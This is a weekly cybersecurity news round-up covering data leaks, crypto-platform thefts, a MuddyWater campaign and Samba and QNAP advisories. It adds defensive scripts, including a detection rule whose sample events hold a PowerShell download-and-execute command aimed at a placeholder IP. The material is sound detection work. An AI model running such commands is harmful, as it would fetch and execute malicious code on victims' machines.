Cyber Round-up for 4th February
Welcome to Ironshare’s Cyber Round-up, where we look back at the events of the last week to cover some of the news, posts, views and highlights from the world of Security.
In this week’s round-up:
The British Council, a public sector organisation that supplies English language courses, has been leaking student information. The leak came from an Azure blob storage container that was left publicly accessible and had been indexed by search engines. The exposed data could allow an attacker to obtain the full names, email addresses, student IDs, enrolment dates and duration of study of over 10,000 students at the organisation. Students who may have been affected are being encouraged to change their passwords.
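The check a practitioner would want after a story like this is whether any of their own storage containers allow anonymous access. The script below is an added example, not code from the round-up or from the British Council: it reads the JSON that `az storage container list --account-name <account> --auth-mode login -o json` prints and flags every container whose `properties.publicAccess` is set. The two containers in the sample listing are constructed data.

```python
"""Flag Azure Storage containers that allow anonymous (unauthenticated) access.

Added example, not from the round-up. Input is the JSON printed by
`az storage container list --account-name <account> --auth-mode login -o json`;
pass a saved listing as the first argument, or run with no arguments to use
the constructed sample below.
"""
from __future__ import annotations

import json
import sys

# Constructed sample listing: one container readable by anyone who knows a
# blob URL ("blob"), one private (publicAccess null). Not real accounts.
SAMPLE_LISTING = """
[
  {"name": "course-records",
   "properties": {"publicAccess": "blob",
                  "lastModified": "2022-01-30T10:12:00+00:00"}},
  {"name": "backups",
   "properties": {"publicAccess": null,
                  "lastModified": "2022-01-29T08:00:00+00:00"}}
]
"""

# Container-level access settings Azure exposes: "blob" lets anyone read a
# blob whose URL they know or guess; "container" additionally lets them
# list every blob in the container. null/"off" means authenticated only.
ANONYMOUS_LEVELS = {"blob", "container"}


def public_containers(listing_json: str) -> list[dict]:
    """Return [{name, level}] for every container with anonymous access."""
    findings = []
    for container in json.loads(listing_json):
        props = container.get("properties") or {}
        level = props.get("publicAccess")
        if level in ANONYMOUS_LEVELS:
            findings.append({"name": container["name"], "level": level})
    return findings


def remediation_command(account: str, container: str) -> str:
    """The az command that switches one container back to private access."""
    return (f"az storage container set-permission --account-name {account} "
            f"--name {container} --public-access off")


if __name__ == "__main__":
    listing = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LISTING
    for finding in public_containers(listing):
        print(f"{finding['name']}: anonymous access level '{finding['level']}'")
        print("  fix: " + remediation_command("<account>", finding["name"]))
```

Fixing individual containers is the quick step; the durable one is to disable anonymous access for the whole account with `az storage account update --allow-blob-public-access false`, after which the container-level setting can no longer re-enable it.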
The cryptocurrency platform Wormhole has been hacked, with the attackers making off with around $322 million in Ethereum and Solana tokens. The attackers are thought to have exploited the Wormhole Portal web application to release more funds than had been deposited. The attack contributed to a drop in the price of ETH and SOL, reducing the value of the stolen funds from $322 million to about $294 million at the exchange rates that followed.
Qubit, a finance platform, was recently hacked, with around $80 million stolen. The attacker took Binance Coin (BNB) through a vulnerability in the organisation’s QBridge protocol. Qubit usually offers up to $250,000 for bug bounties, but this has been raised to $2 million for the safe return of the stolen funds, with a promise that the attacker will not be prosecuted. It is not yet known whether the attacker will accept the offer.
Cisco Talos researchers have observed a new campaign by MuddyWater against Turkish organisations; the group has previously been seen operating in Europe, the Middle East, South Asia and the US. The latest campaign targets private organisations and government institutions using PDFs, XLS files and Windows executables to deploy PowerShell-based downloaders and gain a foothold on a device. The files are thought to be delivered through media-sharing sites and email.
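A document-delivered PowerShell downloader leaves a recognisable shape in process-creation telemetry: a PowerShell process whose parent is a spreadsheet, word processor or PDF reader, with download or obfuscation switches on its command line. The rule below is an added detection example, not code from the round-up or from Cisco Talos, and it is generic to that tradecraft rather than a signature for this campaign. It runs over constructed process-creation events in the style of Sysmon Event ID 1; the field names (`Image`, `ParentImage`, `CommandLine`) follow Sysmon, and the sample events, including the URL, are made up.

```python
"""Flag PowerShell downloaders launched from document readers.

Added detection example, not from the round-up or Cisco Talos. Events are
constructed Sysmon Event ID 1 style records; the indicator list is a
starting point for tuning, not a complete signature.
"""
from __future__ import annotations

import re

# Constructed sample events. Only the first two should alert.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "powershell.exe -w hidden -nop -ep bypass -c \"IEX (New-Object "
                    "Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe",
     "CommandLine": "powershell -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "WINWORD.EXE /n C:\\Users\\u\\Downloads\\invoice.docx"},
]

# Parents that should not normally be spawning a shell at all.
DOCUMENT_READERS = {"excel.exe", "winword.exe", "powerpnt.exe",
                    "acrord32.exe", "acrobat.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Command-line traits of a downloader stage. Each indicator is named so the
# alert explains itself.
INDICATORS = [
    ("download-cmdlet", re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
        r"invoke-restmethod|net\.webclient|start-bitstransfer", re.I)),
    # -e / -enc / -EncodedCommand followed by a long base64 blob
    ("encoded-command", re.compile(
        r"(^|\s)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden-window", re.compile(r"(^|\s)-w(indowstyle)?\s+hidden", re.I)),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[str]:
    """Indicator names that make this event look like a document-spawned
    downloader; an empty list means no alert."""
    if basename(event["Image"]) not in SHELLS:
        return []
    if basename(event["ParentImage"]) not in DOCUMENT_READERS:
        return []
    return [name for name, rx in INDICATORS if rx.search(event["CommandLine"])]


def alerts(events: list[dict]) -> list[dict]:
    """Run the rule over a batch of events and return the hits."""
    hits = []
    for ev in events:
        why = evaluate(ev)
        if why:
            hits.append({"parent": basename(ev["ParentImage"]),
                         "command": ev["CommandLine"], "indicators": why})
    return hits


if __name__ == "__main__":
    for hit in alerts(SAMPLE_EVENTS):
        print(f"ALERT parent={hit['parent']} indicators={hit['indicators']}")
        print(f"      {hit['command']}")
```

The parent-process condition is what keeps this rule quiet: a scheduled backup script from explorer.exe does not fire, while the same download cmdlet under EXCEL.EXE does. Legitimate macros that call PowerShell will still trigger it, so treat hits as a triage queue rather than an automatic block, and note that an executable-delivered stage (the third lure type Talos mentions) needs a separate rule keyed on the dropper rather than on a document reader.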
Vulnerabilities & Updates
The Cybersecurity & Infrastructure Security Agency (CISA) recently added a further eight vulnerabilities to its Known Exploited Vulnerabilities catalog. The catalog is designed to raise awareness of flaws that are being actively exploited and to require federal agencies to apply patches by a set deadline. The newly added flaws include a memory corruption vulnerability in Apple’s IOMobileFrameBuffer, a stack-based buffer overflow vulnerability in SonicWall SMA 100 appliances, and more.
A full list of the recent additions, along with more details and advice, can be found in the catalog.
Samba, the widely used open-source implementation of Server Message Block (SMB), recently released a security update addressing multiple critical vulnerabilities. One of the vulnerabilities covered by this patch has been given a CVSS rating of 9.9 and allows a remote attacker to execute arbitrary code with root privileges. The flaw is in the vfs_fruit VFS module in its default configuration, so shares that do not load fruit are not exposed, and the Samba advisory’s interim workaround is to remove fruit from the vfs objects line of any share until the update is applied. It reportedly affects all versions before 4.13.17; all Samba users are advised to apply the latest updates as soon as possible.
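Two things are worth checking on each Samba host: the running version, and which shares actually load the fruit module. The script below is an added example, not code from the round-up or from the Samba project. It parses an smb.conf (the one shown is constructed), lists every share whose effective vfs objects line includes fruit, and compares a version string from `smbd --version` against the first fixed release on each branch. The page states the fix as 4.13.17; the 4.14.12 and 4.15.5 figures for the other supported branches are taken from the Samba security release announcement and are an assumption to confirm against the advisory.

```python
"""Samba exposure check for the vfs_fruit fix.

Added example, not from the round-up or the Samba project. The smb.conf
text is constructed. FIXED lists the first fixed release per branch:
4.13.17 is stated on the page; 4.14.12 and 4.15.5 are assumed from the
Samba security release and should be confirmed against the advisory.
"""
from __future__ import annotations

import configparser
import re

# Constructed smb.conf: fruit is loaded globally, [plain] replaces the
# module list without it, [timemachine] lists it explicitly, [homes]
# inherits the global list.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   vfs objects = fruit streams_xattr
   fruit:metadata = netatalk

[plain]
   path = /srv/plain
   vfs objects = streams_xattr

[timemachine]
   path = /srv/tm
   vfs objects = catia fruit streams_xattr
   fruit:time machine = yes

[homes]
   path = /home/%S
"""

FIXED = {(4, 13): (4, 13, 17), (4, 14): (4, 14, 12), (4, 15): (4, 15, 5)}


def parse_version(text: str) -> tuple[int, int, int]:
    """(major, minor, patch) from `smbd --version` output such as
    'Version 4.13.14-Ubuntu'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_patched(version: tuple[int, int, int]) -> bool:
    """True if the build is at or above the fixed release for its branch.
    Branches older than 4.13 were out of support and never got the fix;
    anything newer than 4.15 was released after it."""
    branch = version[:2]
    if branch in FIXED:
        return version >= FIXED[branch]
    return branch > (4, 15)


def fruit_shares(conf_text: str) -> list[str]:
    """Names of shares whose effective 'vfs objects' list includes fruit.
    A share's own 'vfs objects' line replaces the global one, it does not
    extend it."""
    # smb.conf indents options; strip that so configparser does not read
    # indented lines as continuations of the previous value. Only '=' is
    # a delimiter because option names like fruit:metadata contain ':'.
    flat = "\n".join(line.strip() for line in conf_text.splitlines())
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",))
    cp.read_string(flat)
    global_vfs = cp.get("global", "vfs objects", fallback="")
    exposed = []
    for share in cp.sections():
        if share == "global":
            continue
        vfs = cp.get(share, "vfs objects", fallback=global_vfs)
        if "fruit" in vfs.split():
            exposed.append(share)
    return exposed


if __name__ == "__main__":
    print("exposed shares:", fruit_shares(SAMPLE_SMB_CONF))
    for banner in ("Version 4.13.14-Ubuntu", "Version 4.13.17", "Version 4.15.4"):
        print(banner, "->", "patched" if is_patched(parse_version(banner)) else "VULNERABLE")
```

Feed the script the output of `testparm -s` rather than the raw file where includes or overrides are in play, since that prints the configuration as smbd will actually apply it. A host that is not yet patched but shows no exposed shares is in the advisory’s workaround state; one that shows both an old version and fruit-loaded shares is the one to deal with first.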
QNAP has published a resolved security advisory related to the DeadBolt ransomware. Shortly after we published last week’s round-up, which covered the DeadBolt situation, QNAP force-installed an update on NAS devices to protect against the ransomware. This soon proved to be a mistake, as it prevented victims who had either paid the ransom or otherwise obtained a decryption key from recovering their files. Users affected by this update can contact QNAP support for help decrypting their files.
We have updated the Advisories and Resources section of our Log4j Vulnerability article.
We recommend keeping up to date with this information as vendors continue to fix their products and provide updates.
And that is it for this week’s round-up; please do not forget to tune in for new instalments every week.
Stay Safe, Secure and Healthy!
Edition #177 – 4th February 2022
Ironshare – Security Simplified